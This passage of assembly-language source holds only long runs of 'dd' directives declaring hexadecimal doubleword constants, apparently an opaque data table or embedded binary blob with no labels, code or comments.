dd 83B2501Ch, 35B1BD08h, 0F9431014h, 8ABF9A43h, 3F092FFDh
dd 0B549B40Bh, 0DA465071h, 0B025AB43h, 10295B5Fh, 0E313BD54h
dd 8B2200F9h, 0E09FFCDAh, 0C8905BDCh, 0A396B059h, 0E0D9BB2Ch
dd 0C67DBBDBh, 70F24ADh, 0E6DC5AAh, 530DD747h, 6B293CCBh
dd 0AAAE8068h, 0CA24E178h, 66676F4Bh, 0EB6E600Eh, 50D40A21h
dd 2CA2B328h, 0E961DF8Fh, 8A593727h, 49DA389Ch, 0F395B357h
dd 0D786D6DBh, 3C0B2251h, 32A939C1h, 46294367h, 69954CF0h
dd 9751946Eh, 0B5F98C0Fh, 0CE53C28Ah, 0F2D7C600h, 0E411983h
dd 30D21530h, 45545F84h, 61F61016h, 947B9792h, 0B4E9BF14h
dd 0A016B2D8h, 80929004h, 0F7C00D0h, 6EE73934h, 476542A1h
dd 78E37C25h, 8C8EDEB9h, 83339E3Ch, 0CD9D90F3h, 0EC16E847h
dd 35E400CAh, 6038157Fh, 69A97ACAh, 7644306Ah, 95AA82C9h
dd 0C0B28516h, 0FDD6B098h, 9EFF7D95h, 0E5087080h, 405A457Bh
dd 5E53CF88h, 0C142003Ah, 0DCCAEF68h, 75B1CE96h, 0A0A68E4Eh
dd 0AE0E3CADh, 0E1C85A05h, 3537AFD2h, 1A1BBD4Bh, 8B2200DBh
dd 45C9F216h, 459775BAh, 0A08688E8h, 0B8C4155Bh, 0E9747040h
dd 0E86AA8Ah, 2137CBB6h, 50E9DF26h, 1F85D1A8h, 0E4865343h
dd 0E403B430h, 80F2985Ch, 23282330h, 0CA61482h, 0AAF3CF28h
dd 0BE2009Ah, 735384E0h, 3F89D2F6h, 0B068828Dh, 13026F94h
dd 9FB0E7F8h, 40C1B873h, 66153008h, 538D4FC7h, 0AC72B42Eh
dd 4A2F2F7Ch, 4836A0C6h, 7F4D6E08h, 9FD87018h, 9C27AF93h
dd 132620FAh, 0E8279DADh, 0B11EE0A2h, 90CB810Dh, 5F47E189h
dd 90AC16C1h, 600598D0h, 13DF504Ch, 1235628Dh, 4CCE546Ah
dd 6A6B0FC0h, 287AC002h, 0A0F6B0B2h, 0F202E343h, 69A1ED9h
dd 0BF3A506Dh, 30D8023Dh, 3AE79924h, 0EFDEE09Eh, 0BDD75D2Dh
dd 29D6A081h, 906DD091h, 0F5312190h, 405A6E86h, 20C2581Bh
dd 0B5CF1004h, 0E0AEE90Ah, 0E6875DA5h, 48B6A047h, 7FCD6536h
dd 0D2BB716h, 402A40F2h, 4F03B338h, 2200FAh, 0FEB365EDh
dd 944AD0CCh, 0A0FCB132h, 8010F886h, 0F571F050h, 401A6FE6h
dd 55DCF0CDh, 608F9DE6h, 0B27EE05Eh, 7577D6D6h, 0A066AE55h
dd 0D0A2C6E0h, 0F5912261h, 40FA6F82h, 6F3CF70h, 0C6E2009Bh
dd 0F01FB7A5h, 0CC32D09Ch, 0F756B018h, 0CB91DFC7h, 24604223h
dd 0BFCA1CC0h, 3078BA9Dh, 7AA8384h, 6D3EF000h, 0D0A231C9h
dd 1DBBE9F8h, 80A2AE82h, 9FDB4D18h, 40A6B893h, 697130E8h
dd 45EC592Ah, 0AC5ADEB4h, 5565D010h, 0A0068E52h, 49D50D1h
dd 600E72E5h, 408F38DFh, 958B30C8h, 92095Bh, 0F2437D99h
dd 287AC003h, 5F0945BEh, 0BF642DB7h, 6FEE70A0h, 406840A8h
dd 0B00AB1A8h, 54621025h, 0E0DFF1C8h, 36CF2F1Ch, 21D6A0A6h
dd 805300D0h, 0B4452090h, 0BF185066h, 30F9261Dh, 59829504h
dd 68D6FDF5h, 3F3AD0EFh, 0B0881AEDh, 3D07BF4h, 70B01FCDh
dd 695F50ECh, 3ED5B5E5h, 0FF7210F4h, 0F0A1F2F5h, 0CFDA55DCh
dd 0A09739DCh, 8C521BD4h, 507170DBh, 5E65D543h, 0A5403058h
dd 125183h, 8A7E9A41h, 3FF8BABDh, 0B049BEADh, 7F0A13B4h
dd 610EF43Fh, 0CD7950ACh, 30785BBDh, 52F27AA4h, 1ECB0F73h
dd 45DAC0A2h, 0E0D3BFD8h, 0DD29095h, 7050FCADh, 0A8C2E18Ch
dd 0DFB9CA34h, 0C284ECh
dd 615AE00h, 949EE4F5h, 9EB42507h, 3D3F9064h, 603E6E6Ah
dd 5D4251DDh, 0ADD9CF12h, 10BC97F1h, 881E9AE0h, 0C09AD048h
dd 35E9E38Ah, 8082AF5Eh, 742A345Dh, 262C5C1h, 2F5630D8h
dd 44091AF2h, 3FE4E4h, 0C130D234h, 0B2F4FAAAh, 0C479937Eh
dd 816E7894h, 488A9123h, 4A23BF9h, 5050EF34h, 0DF964D2Dh
dd 0DCB2D00Ch, 85D6B098h, 0A02AA63Ah, 40E050BEh, 656F7536h
dd 5BE08A6h, 7367307Ch, 0A9F1BA8Ah, 973AF0B2h, 9E8C2587h
dd 44B390E4h, 60AE70DCh, 177A5086h, 2A33CF3Bh, 8B2200DBh
dd 0F08B60EDh, 231ABADCh, 0AD5FDB43h, 80177885h, 45A87050h
dd 170A5AA8h, 1EBCA5B7h, 0C48110D4h, 0EB95A04Ch, 0C0FAD7D4h
dd 0CB3D38h, 0D7F280AAh, 6AFB8F63h, 0C5EA4093h, 0AD324EE8h
dd 10DD5811h, 70FB7320h, 0C0DAC089h, 0E1113D95h, 4EF99084h
dd 361F707Ah, 465FAFDFh, 0A3462037h, 2FBC107Ch, 6DC07B91h
dd 0D08598C9h, 523B00F8h, 0E0A2E5DAh, 9FD45A18h, 57D83193h
dd 57AB390Bh, 8B48FB65h, 6DD0DB2Fh, 0D0A598E1h, 27B243D8h
dd 0D32B7BA3h, 5EF4E52Fh, 0FD0A505Ch, 201625BFh, 68A86445h
dd 0E0FE85F0h, 0FED045C3h, 1D76B0A8h, 8062D173h, 0A7FF04B0h
dd 50743FA9h, 20E630A8h, 47E7D624h, 0E0DEE0E1h, 3FA4D8F5h
dd 20537767h, 80528001h, 3D4E7090h, 4D4A54CEh, 4EE67F82h
dd 202C7F6Bh, 8C9E96EFh, 0E15FB695h, 0D496FF58h, 0A057FD9Dh
dd 38E1F04h, 224F3C89h, 45D2511Ah, 20281DC5h, 0C0BED040h
dd 0B569F093h, 0D2F3DD35h, 0F273F7F4h, 41E01534h, 25585AC1h
dd 54E85524h, 737175A8h, 885E892Ch, 0B98AA0DDh, 0C418D118h
dd 0F08AF594h, 11A1355h, 60C624C2h, 4E07445Bh, 678C79C0h
dd 0ED73D01Ah, 0B4BB8796h, 0CE3FD87Bh, 0ECB3B0F3h, 12A507Ch
dd 2EAB70F5h, 4928106Ch, 2CB678E3h, 92519620h, 0A9C8B65Ch
dd 0D352DE9Dh, 0F792D954h, 5A5A1991h, 28FD5A61h, 43428Dh
dd 20C76205h, 0CC6B9F99h, 0A9E8B67Ch, 0D372DEBDh, 0EFD1B06Bh
dd 402F15BDh, 29AA2405h, 497210BBh, 20A37529h, 93D98489h
dd 0B41BBC1Ch, 24F291DDh, 0FA71A0F3h, 417E3F64h, 12226167h
dd 72D4709Fh, 7A685013h, 89529FC8h, 0D47325BCh, 3859A03Eh
dd 4C0E577Ch, 6FBEB2FCh, 527148E9h, 0AFE3AA86h, 0B3100581h
dd 0E0BE2838h, 0C03AD0FCh, 0A0B6B078h, 803290F4h, 60AE7070h
dd 402A50ECh, 20A63068h, 2210E4h, 0E09EF060h, 0C01AD0DCh
dd 0A096B058h, 801290D4h, 608E7050h, 400A50CCh, 20863048h
dd 210C4h, 0E07EF040h, 6A4BD0BCh, 23167E6Ch, 90B02811h
dd 0C5ED7030h, 40FA1210h, 63D13F28h, 18B19DB0h, 0E615472Fh
dd 8451009Fh, 0E27D943Ch, 0BBCBE298h, 743D7852h, 6BDE1207h
dd 0B5CF3C4Ah, 0D2523Ch, 0A2827589h, 0C551D06Ch, 421E727Bh
dd 8470F1ADh, 3FABF8F0h, 0A8AA4048h, 2026308Ch, 0A2300Ch
dd 6C9B7DE0h, 999AC07Fh, 0AC62A8E1h, 629650D7h, 0F48B8F27h
dd 838A400Eh, 0AD05E93Fh, 92341Bh, 9001E023h, 437A5FC0h
dd 5614B450h, 0A3FE0DBDh, 5A6D70A0h, 6B6F242Ch, 3094339Ah
dd 589E5EA9h, 0DA5DAEFBh, 3F5EA41Ch, 5FD55BAAh, 0D7BA8066h
dd 4B318F6Fh, 0FCC77BC2h, 78C620CAh, 0C3765B07h, 0A226750Fh
dd 45FDD0ECh, 0A0A6F2ECh, 803290F4h, 60AE4C98h, 0D4AFDBECh
dd 0C8A6202Ah, 0FFDDE64Dh, 0E09EE888h, 54A753DCh, 0A096A01Ah
dd 1D9B98A1h, 609E5458h, 0CDF5CC27h, 209672DCh, 98879F07h
dd 697EE002h, 0D0B84429h, 0A0755838h, 49C190B4h, 0E0FDFBF3h
dd 12EA50ACh, 0DF98DDC0h, 0BC77135Bh, 0E35EE062h, 0CCA0534Ah
dd 0A7D2BF18h, 3D29095h, 6F4E606Ah, 40CAAD08h, 2C04BB08h
dd 0FE0AF8D4h, 653D0FFFh, 0C0AA92C0h, 2A6676FBh, 804B107Ch
dd 99AE6984h, 0A92442h, 68ADC103h, 0DF439165h, 61C12F3Fh
dd 8CD694A5h, 0F9FAC5D8h, 7911587Fh, 0D7817F2Ah, 268A504Ch
dd 13F84849h, 0AB071F76h, 0B6FEF0C0h, 0B57AEABFh, 0B0BC3BBDh
dd 8AF992DFh, 88BF81B3h, 0BF95AE5Eh, 625A85ABh, 85CF1034h
dd 0EF258860h, 0C05A5498h, 1C634F98h, 0D0528056h, 9F302578h
dd 0FCCF53F3h, 0AFC620CAh, 1000AC81h, 0C4BAF380h, 0C2FA53AFh
dd 16B96B4Bh, 2073FCh, 0A1FD50B9h, 692E74C8h, 2C8F1474h
dd 0EB624BC0h, 0EF657189h, 0B4C76B0Bh, 86D3166h, 0F4C9FE91h
dd 3975F166h, 34F5F1F7h, 0F67DB166h, 74AEA5E6h, 73857166h
dd 0B4098855h, 0DD8D3126h, 0F401C85Dh, 2695F126h, 340B7593h
dd 109DB126h, 7403359Bh, 78CB0F26h, 9BDAC0DEh, 5FA9C1F1h
dd 4251CE6Bh, 9EA19904h, 4309AF73h, 0C81E3462h, 0FF3DE5CDh
dd 0C6076588h, 78DCD06Ch, 4234A8C9h, 82B174B4h, 0A851612h
dd 6E42086Ah, 0A3D9CF1Dh, 0D12518A6h, 846F58Ah, 3F65257Dh
dd 0D3154A58h, 82C2205Fh, 70284955h, 6761FA4Ch, 8A5E58A2h
dd 7581EAC4h, 8EF40D8h, 3F85253Dh, 0A0F6B100h, 0F4A01434h
dd 9E0EA1BDh, 0AB9CBBE6h, 20E688ADh, 0E2C99024h, 7553331Fh
dd 0C04AE98Ch, 7A2167B3h, 4D767D7h, 60CE60A9h, 4F42500Ch
dd 0C007F01Dh, 82C7E60Fh, 0E1BEE0B9h, 0CD5CD689h, 0B35D95F1h
dd 0B9B01502h, 15AC7060h, 712736EAh, 46A2DB4Dh, 660711E9h
dd 1F2218CBh, 83912F23h, 0C03396Ch, 2B128096h, 0E40B8793h
dd 400A40F5h, 2F8E3048h, 0BC06D051h, 1FE218EAh, 55732F43h
dd 0A066F288h, 0B9701542h, 156F7020h, 0ABDB5FA8h, 8BA61B2Ah
dd 8467E767h, 0E05EE019h, 0B4D2D09Ch, 0DED33A3Fh, 41D280ADh
dd 6D287BF0h, 0EBAC1507h, 0AAECC8B8h, 10FB6E01h, 0FBDE3100h
dd 49DEB779h, 60051BFEh, 92593B12h, 65A11448h, 0C520FB6Ch
dd 20360996h, 0E0634860h, 26DD5BF8h, 0D0BD44D9h, 85FDB9D8h
dd 0A0796CE4h, 60E5C8B6h, 5961FB2Ah, 0C85E34A2h, 0FF7DE44Dh
dd 212CF44Dh, 0C51CD8DCh, 0B907031h, 10C293DFh, 38CF1A1Ah
dd 0BF99A0C4h, 0B463B057h, 6620003h, 93D60A20h, 0B4885433h
dd 0D41C4E5Bh, 0F4986ED7h, 14048E57h, 3480AED5h, 540CCE84h
dd 7488EE0Bh, 0B47408Fh, 6ABD6037h, 645D6BC8h, 40D96544h
dd 0DC4588C0h, 0C4AFA72Fh, 20A62051h, 0B02210C4h, 0E49C85E6h
dd 3E555DD8h, 99EA15D2h, 2B7490C4h, 158B8CD0h, 0C00AE0CBh
dd 8AC6CF07h, 0FFFD722Ch, 64FB07BFh, 0C0FAC085h, 0C676B078h
dd 0F5C3F60Ch, 647C432h, 4AF2E007h, 305F4EADh, 302D0A4h
dd 1F63188Ah, 486A2F63h, 99D235EFh, 0D29084h, 623B7010h
dd 0E540D63Ch, 20560974h, 0FC42BBE2h, 50398505h, 3FF5507Ch
dd 2DF51AB8h, 908B00C9h, 9F2398F0h, 0C55DAF93h, 2036096Ch
dd 10A21064h, 80AEF394h, 441F27F6h, 0A016A0E1h, 0F49A9054h
dd 0EB5BC8D7h, 0F2150A0h, 1982B53Fh, 811054h, 64F1F1C0h
dd 0C07AD0CCh, 0B5C5808h, 0C2EE2DBDh, 0AC0670A0h, 0F095AFD2h
dd 0A94D9A40h, 1020B099h, 1E6318A0h, 45AD2FE3h, 0A0C6891Ch
dd 80529017h, 0E5396AE4h, 405A6988h, 21C63088h, 2EAA1A70h
dd 8410F7Eh, 3FC52E67h, 0B1C59C8h, 0C2AE157Fh, 0AF257060h
dd 0FDA398C7h, 20B672CCh, 0B8DE586Dh, 0D6619407h, 0A6DAE377h
dd 241347F3h, 831280EDh, 148E7050h, 0C28FA6DFh, 0A0862071h
dd 0AAEA1AB0h, 8810FBDh, 3F052EE7h, 2912D780h, 40C13B92h
dd 0E599DB56h, 40FA6928h, 2066302Bh, 85144AD0h, 0E04EC9A2h
dd 28D0A51Ch, 5FA94D99h, 7F2CA27Ch, 9D4C98EFh, 607AAF73h
dd 0DFBD24E0h, 66FBF37Bh
dd 862B0FB8h, 4B1141D7h, 0B00F346Dh, 77606774h, 602E7332h
dd 0A8BE256Ch, 0DFD9CC34h, 0EE4A0FD4h, 86E10F1Ah, 0A68F2FE4h
dd 2BBD2173h, 24171B9Bh, 4B0E6092h, 0BCC2D984h, 1982B53Fh
dd 811054h, 0D88AF0C0h, 0F9FE55CBh, 0A0F6B0A8h, 0AC069634h
dd 596AF547h, 406A503Ch, 2A9331A8h, 0FF9FD2CCh, 1D95185Fh
dd 45AD2FE3h, 0A0C6891Ch, 84529014h, 0CC267AE4h, 0A8B5AFF1h
dd 0DF39CDE9h, 39C695F3h, 0E0BAF090h, 0D74ED0FCh, 5F4B2690h
dd 401B280Bh, 0D805B88Eh, 445E90E4h, 0D8D388C3h, 0E889770Fh
dd 1F610D1Fh, 0F99E552Bh, 0A09EB048h, 0F26790D4h, 590CCDD0h
dd 340A50DCh, 0DDE3D821h, 29BAEF3Bh, 0EAB7D958h, 0D0C3AE19h
dd 0A3927038h, 0B98C35BEh, 88C57020h, 0BF15ADE7h, 0AACC8198h
dd 10DB9221h, 0DCB65A20h, 0CF252F61h, 992835AEh, 845F9084h
dd 0A10E74D0h, 0CD7A586Ch, 21F69B6Eh, 202A472Eh, 0C9C10FFDh
dd 78DCF440h, 576F4B1Ah, 908B14F1h, 602E60F0h, 0F0AD246Ch
dd 98409AA1h, 0E1A0EA11h, 1CF65B86h, 70652FA0h, 60251A30h
dd 82F19FFh, 970E6092h, 50B3D4C9h, 200610C8h, 57956544h
dd 1F022E28h, 0FF18AC3h, 6ADDE808h, 0B90E153Eh, 2A6770A0h
dd 8882FAD0h, 4619CF54h, 0F7A2919Ch, 0F0E77425h, 0C05A901Ch
dd 20D5C498h, 2558B8D0h, 60DE49ECh, 0FDC3FB6Ah, 20D67204h
dd 84C7E7AFh, 0E0BEE0B9h, 0B57AD0FCh, 0A2E60071h, 900BEC71h
dd 0E559DA70h, 403A6968h, 20A630E8h, 0B8921B91h, 0D9E3756Ah
dd 2BB0D0CCh, 912ED665h, 49767CCh, 608E6069h, 340A50CDh
dd 2AAF804Ah, 103B6D61h, 0E39A3040h, 0F98775B6h, 0B10B028h
dd 707328D2h, 59EAF5C7h, 42EA50BCh, 22133028h, 0A5E8D810h
dd 0E04EC95Dh, 7D537BFAh, 0A046F2B0h, 80FB002Ch, 0E5B9DB10h
dd 40DA6908h, 20463000h, 202A61F0h, 17C10FFCh, 0D08354F9h
dd 0A032B0F8h, 30B9E574h, 1EAB7A48h, 0EAAA4055h, 0A5D17D03h
dd 0B229E0h, 0E01EF8E0h, 78FCC129h, 51C505Bh, 8082A92Ah
dd 0A03DDBB6h, 269FBBE6h, 2A1E1970h, 10BB6EE1h, 0E31A30C0h
dd 0F9047536h, 0B90B0A8h, 0B9F615C3h, 70EE70A0h, 0F80C502Ch
dd 2392F029h, 0A6AD4A4h, 0F0E78E05h, 0CFF1B61Ch, 9954352Eh
dd 68F99004h, 9F318B3Fh, 79CED5FBh, 20C63098h, 0E365004h
dd 65BCA030h, 0C02AE980h, 5B2358D2h, 0CFBF6F0Bh, 0F023F98Eh
dd 0B72A40AEh, 309FB4EDh, 2210E4h, 509284E0h, 49B17A34h
dd 0B0D404E5h, 68177BD4h, 9F718BB1h, 0BFF13A24h, 0A403C7B7h
dd 200FDh, 957EF140h, 0CABA60B7h, 0B04FCCBDh, 8F193AB4h
dd 0A0EDC856h, 7996F5A6h, 8B003038h, 0F7481114h, 0F06774A5h
dd 0C2DAD09Ch, 5779C518h, 90EB1411h, 644E7010h, 0F0D0258Ch
dd 5EC33AC8h, 8AC200BDh, 0F00773A5h, 0D05A117Ch, 2150089Eh
dd 6BB220DFh, 6A6EC0F8h, 50932EE9h, 0A5D19AE8h, 0B229E0h
dd 0E016F0E0h, 78FCC029h, 51C585Bh, 8082A929h, 61BEDBB6h
dd 83A58A7h, 197BB5C2h, 0E8281054h, 1F010A1Fh, 0F9FE55CBh
dd 0A0F6B0A8h, 0F5C39024h, 0D88855C5h, 0E560A8AFh, 20F609D5h
dd 0C051BB42h, 7063D90Ah, 375AC05Eh, 0B0EF341Dh, 0A0529014h
dd 0D1D10590h, 2651BB7Bh, 2ADE3930h, 107B6DA1h, 0E35A3080h
dd 0F94775F6h, 0BD0B068h, 0C2A22DDDh, 0A1247060h, 2BAF566h
dd 8BC03078h, 85204854h, 0E08EC91Ch, 3A633876h, 25614FA7h
dd 8002A950h, 618E7053h, 0C5FD7CB8h, 209609CCh, 40210C4h
dd 6589D035h, 0C0EAE938h, 0A376B038h, 5E1A9AC1h, 88918FC9h
dd 0BF15AAE7h, 0DF9C30C0h, 0FAA3F85Bh, 65A90FDFh, 0C0CAE918h
dd 0A856B018h, 496298E0h, 9A6398BAh, 0C53DAF73h, 2056098Ch
dd 10C21084h, 0E78EDA74h, 0F9C65556h, 40F7B0E8h, 883B9D6Eh
dd 0C52C70D4h, 40BA6910h, 0A025D428h, 0E80914A0h, 1FE1091Fh
dd 2830B1ECh, 5FE9492Fh, 606D2832h, 5972D5DAh, 0EBEC505Ch
dd 0DFFFD620h, 8407E7BBh, 0C0FEE0F9h, 0B47AD03Ch, 2B313BFCh
dd 903018B9h, 0E92F5BB0h, 18DAAC6Dh, 199AB5A2h, 0E8C81034h
dd 1F21091Fh, 0F9DE55EBh, 0A0D6B088h, 8C269054h, 0A39EC8F6h
dd 7936D506h, 2A2D3098h, 0E0BDA862h, 0D9C2558Ah, 6B5CD0ECh
dd 5F4F2690h, 4B7670Bh, 63AE6049h, 342B50ECh, 0AB69BB37h
dd 1060B061h, 6956DB60h, 9292C94h, 991235AFh, 801290C4h
dd 6EFB70D0h, 7976D541h, 280C3058h, 3FB9084h, 0E4F30833h
dd 0D0DE9471h, 0A8967138h, 63591B04h, 51D61636h, 2641366Ch
dd 48E6BF90h, 0E2101Ch, 4B381122h, 95F7BC4h, 1830B66Dh
dd 2BB450A5h, 88E4B3A0h, 0BF35A9A7h, 19C2B5FFh, 0C21094h
dd 0FA4A7000h, 45311FF7h, 0A026F24Ch, 0C83B585Fh, 9951980Ch
dd 831AAF93h, 0D923D842h, 852FEF9Bh, 0E00EC970h, 0F91E55ABh
dd 0A016B0C8h, 86E7B054h, 38F65B87h, 130149A7h, 0BFE1BE0h
dd 0A80F9B94h, 0E1FEE082h, 0D03858A9h, 2BCFB1B8h, 976B470h
dd 70FE180Dh, 0CCD7DB2Ch, 0BE620EAh, 102098A1h, 645B07A0h
dd 805AC025h, 0D4D6B098h, 2B8A6716h, 36CE7452h, 84F7D35Bh
dd 20C620CAh, 19B940Bh, 0ED56F080h, 8B3AD0FCh, 0E5F8E23Dh
dd 0AE00A3B8h, 60E23C34h, 7E58C513h, 0A52F3078h, 32523Ch
dd 0DCC67B33h, 0B3E508DFh, 94D53B70h, 7FE7893Ch, 0D81BFBAFh
dd 1B0A408Eh, 0A98A724Bh, 1040CC41h, 0E83CF340h, 821A5535h
dd 0D3FDB028h, 416F9Ch, 886E7030h, 0BF15A45Eh, 62DE8DA3h
dd 0E8B410B4h, 1FA104C6h, 82624517h, 0EADDB008h, 8C98939Ch
dd 89CDBE3Bh, 20425F89h, 2F463009h, 0C34A00h, 5C8BF300h
dd 0C3BAC03Eh, 0B074C84Dh, 688E3C74h, 608CF5FFh, 627506Ch
dd 58A31BECh, 3A20026h, 43F6A0E6h, 43652FA8h, 0B0540865h
dd 8BE79054h, 6F0237EBh, 408B4BCFh, 190ADBC8h, 10C0A8D1h
dd 0ED7BFFC0h, 0C37AD03Dh, 0B0B4C83Dh, 0B8F3F634h, 0E5E1554Fh
dd 406A50D0h, 0BE47023h, 0E8322467h, 1F2104C6h, 82E26D25h
dd 25D9B088h, 805290F0h, 2272F593h, 0C549501Ch, 20D672F0h
dd 4769108Fh, 2D3CFF8Ch, 0FB3AD0FCh, 23B9B83Fh, 80329030h
dd 63ACB0F3h, 0C52944ABh, 20B67210h, 0B5DD40B6h, 0E08EB2B8h
dd 0FE284523h, 25CCB048h, 37979F14h, 898E7050h, 400A5050h
dd 0A589CF74h, 21050h, 0EF6BCEC0h, 0C0FA5B39h, 0A1303B38h
dd 0D0C6D39Fh, 9F9D85D8h, 0F8576953h, 5566206Ah, 0BC6713D3h
dd 0E35EE062h, 0D098A819h, 44D33918h, 0BD280D6h, 0BCCB4B10h
dd 32CA40CEh, 0C0C30B00h, 72C200C6h, 0E03ECD69h, 0F7C8A07Ch
dd 0A036AF10h, 7CFC1D74h, 6205B17Bh, 7BBA126Fh, 3064D46Dh
dd 83AE6564h, 0D1E1E024h, 0DCBE94D3h, 630D5BB9h, 0C20A15DBh
dd 0EB6E70C0h, 50C828F9h, 0D495D8C8h, 0A9E3EFBBh, 60FEF0C0h
dd 8751DE49h, 9BFFC2B4h, 27D9873h, 9F118F8Ch, 0F2EF5F65h
dd 0AB19CF56h, 0A7E33418h, 0E0DED924h, 2FA52FE3h, 0EA57F273h
dd 8052F030h, 0A0FD3E70h, 0C76E5C87h, 3084F40Dh, 0C0C79904h
dd 6DBEE0C2h, 0C0135845h, 0D833B378h, 0E63280B6h, 4BE0D5D5h
dd 5468532Ah, 0E6AA7243h, 0C7CAEBA2h, 0E09EA3E1h, 0C01AD5DCh
dd 5CD03958h, 0D7D1CE8Bh, 5EF0E5AFh, 0A8CB50DCh, 3A033F57h
dd 500210C5h, 8A569A14h, 1E6F2F43h, 2576A006h, 8FDCF74h
dd 606E7135h, 0BF0EDC44h, 2077D8D7h, 65B110A4h, 8C37B654h
dd 0A3BF83F9h, 0D43FC26Dh, 7FD2D1EDh, 700C3CA5h, 725FAF8Ch
dd 0A9462036h, 10804401h
dd 0E0271800h, 0A5E9D07Ch, 0C55DD1ACh, 0E5DCE73Bh, 9460382h
dd 29D8001Ch, 454A599Eh, 57A27503h, 1FF6AD08h, 0C08938A3h
dd 0C545B0D8h, 0F4E1F506h, 306B02BFh, 29FC393Eh, 456155A4h
dd 3F6A4744h, 8010F28h, 0C07AD02Eh, 0C1B4D5EBh, 0F007FB57h
dd 168702E0h, 270F3C45h, 0C8B130CDh, 0FF9DF806h, 0E0DEE848h
dd 833F831Ch, 0C7B8D1F0h, 0F43DDE71h, 30B716F9h, 293C397Eh
dd 45A155E4h, 0FFAA4704h, 0B0410F67h, 50BF5DA8h, 0CAB6A045h
dd 8158C090h, 8A3B8F27h, 0C92A40D2h, 0B5591454h, 322EC2h
dd 5D13304Ah, 0C00A9194h, 5FC6E008h, 902F0061h, 608F1850h
dd 2A5E50C8h, 0B5796749h, 125290h, 0B77A9A14h, 82AE4543h
dd 64F5B028h, 0CC476FA0h, 9F6E6072h, 50D43239h, 0ADA56F28h
dd 10A35811h, 75A1A620h, 0C0CAEEFAh, 0AFA9489Bh, 80D22B10h
dd 38CBF910h, 2ACA40CEh, 0B5B96608h, 0D22E26h, 64313085h
dd 0C0BAD0D8h, 0F06670D3h, 0EAE2931Eh, 602E18F1h, 0BFFC906Ch
dd 3018727Dh, 0FF5A9364h, 0E61974EFh, 4513D05Ch, 0A006F284h
dd 0C2F21DD9h, 0F58370C0h, 409A1224h, 206C6299h, 6E17EF14h
dd 63FEE0FEh, 44752FC4h, 0A0F6B56Dh, 358D905Eh, 60FE32ECh
dd 7E00C5D3h, 0D86530B8h, 0BEE61FDBh, 69DEF0A5h, 0D018A099h
dd 0A31F8398h, 0D102C1D7h, 9F9F74FAh, 50080CB9h, 6653CF88h
dd 8542003Ah, 7A3AFF40h, 0F33AD0F9h, 0D43339B1h, 0D13280B6h
dd 7FC62121h, 102A5FECh, 1E28A597h, 0C0A710F4h, 0E5CD746Fh
dd 4593D0DCh, 0A086F220h, 0F2F92817h, 2B057050h, 0C48FA7F4h
dd 20862071h, 752210C4h, 88FBF346h, 0F3FAC0ACh, 57B7B3EAh
dd 9136745h, 702CF4B5h, 6965E8ACh, 6BED3028h, 68671398h
dd 0D35EE030h, 371BD34Eh, 29B747E9h, 9090EC11h, 0D741B310h
dd 0A33356C7h, 3815BD3Dh, 1481A78Bh, 8B772003h, 10B9F8BDh
dd 0D7698A79h, 0F44BFE1Dh, 6C54F3EDh, 0CB4A226Dh, 62AD0CA3h
dd 10E01370h, 1F56B46Dh, 1B909ABh, 0E26635E3h, 0B519044h
dd 531E5484h, 0F808DF8Ch, 0E30630C8h, 0B69DFCFh, 0A1B64D4Dh
dd 4B86D02Ch, 0C3F8367h, 8600F108h, 62990A8Ch, 7CC07000h
dd 1C0A44F4h, 3CBF640Ah, 33685A0h, 0FD5B5BD5h, 0A093E8DDh
dd 0D36F9B60h, 6FCE22D3h, 0BFB56389h, 1DC5BB77h, 430C5953h
dd 1F98748Fh, 97072F03h, 0AFF8E53Bh, 7FCD8B70h, 23F94D8Fh
dd 0C42562DFh, 0DF59CF78h, 547140D9h, 0E51AFF2Fh, 0F3E52F23h
dd 5EBB5883h, 90676F2Bh, 9F728AB8h, 0BE2BB833h, 0A489CFB7h
dd 0FFFDEE28h, 0F6962273h, 28FAD0BCh, 5F894F5Bh, 80F2905Ch
dd 8DEF2D30h, 40FA64BFh, 2065CAC1h, 321D74A4h, 0A22645ABh
dd 49BED08Ch, 9ED7D63Ah, 5DDCAD9h, 604E73F3h, 43F60E07h
dd 1BC756D6h, 85CD55D4h, 0E03EF3D3h, 0C0AC938Bh, 0AF36B0D8h
dd 80B156F1h, 3C6D86F0h, 0FC2E5F6Eh, 0AB2630EBh, 0A09F1827h
dd 0EFBE5040h, 0C0997ED8h, 80368DD8h, 49DB074h, 600E7373h
dd 4042DBC7h, 36E530C8h, 0EF0AF815h, 6DFD0F3Fh, 0C06A9280h
dd 0C1757EBBh, 0E1F19074h, 0FB0670F4h, 4F95AFD2h, 20E54A2Ah
dd 0C0C79324h, 0E0DEE0E2h, 4B529297h, 61FDA0D2h, 40619467h
dd 0A8CD757Bh, 0C95A1A85h, 3084B00Dh, 0C081304h, 0E1BEF038h
dd 7ED281FCh, 90494F9Eh, 900B1261h, 508EC170h, 5013D359h
dd 0DE865A68h, 145A482Dh, 1F785488h, 0CFC85523h, 424572CCh
dd 0B99605E5h, 85657040h, 798ED53Bh, 20863058h, 227611C4h
dd 0D9FA75B7h, 0C0F9D0ACh, 0AC03B038h, 0B9763535h, 9F917020h
dd 4A01AB53h, 19E2BDA9h, 0E210B4h, 0E636F820h, 99DAD09Ch
dd 0A056B670h, 0D63AC894h, 0EAB18FF6h, 50F32C09h, 0AC2B608h
dd 0D229F8h, 0D9427588h, 2058D06Ch, 99B2350Fh, 80BA9064h
dd 695B70F0h, 79D4EDECh, 542730F8h, 8427E7A1h, 0E01EE0D9h
dd 0B492D05Ch, 0DCAB30C3h, 8592806Dh, 0DD8EC0A4h, 409A6931h
dd 0A0A144CDh, 10BB6EF9h, 7E8AF5C0h, 0F9FE55CBh, 0A0F6B0A8h
dd 89068034h, 5992CD30h, 3768503Ch, 0E443B321h, 620066h
dd 1F2C5648h, 3D1938E3h, 0D13E4F67h, 0B529016h, 708C0C0Dh
dd 0C0D7530Ch, 0C8C620CAh, 0FFBDEC5Fh, 0E2EF748Fh, 75B1D0FCh
dd 0A0A6F200h, 830ECE7Fh, 9DF298AEh, 0C225AF13h, 20A63253h
dd 60065A65h, 6B7EF060h, 0C34C8222h, 0DA95A422h, 49767C4h
dd 608E6069h, 352A50CCh, 0E83BB95Ch, 8D020086h, 0F04760F5h
dd 0A8775BBCh, 5376A028h, 0E44BC710h, 0ED6E703Ah, 50FA5019h
dd 91C3C328h, 0F3E0F3A4h, 64DB0784h, 0C0DAC0A5h, 0AF76B018h
dd 80D23E10h, 483D8F10h, 0BF278164h, 98D3BBF7h, 85C200C6h
dd 78BAFFD2h, 4BBAD07Ch, 0B074C84Dh, 90F81B74h, 0A3A71h
dd 6B4A506Ch, 225538A2h, 72A1D957h, 8893CBF4h, 4B9AC04Ch
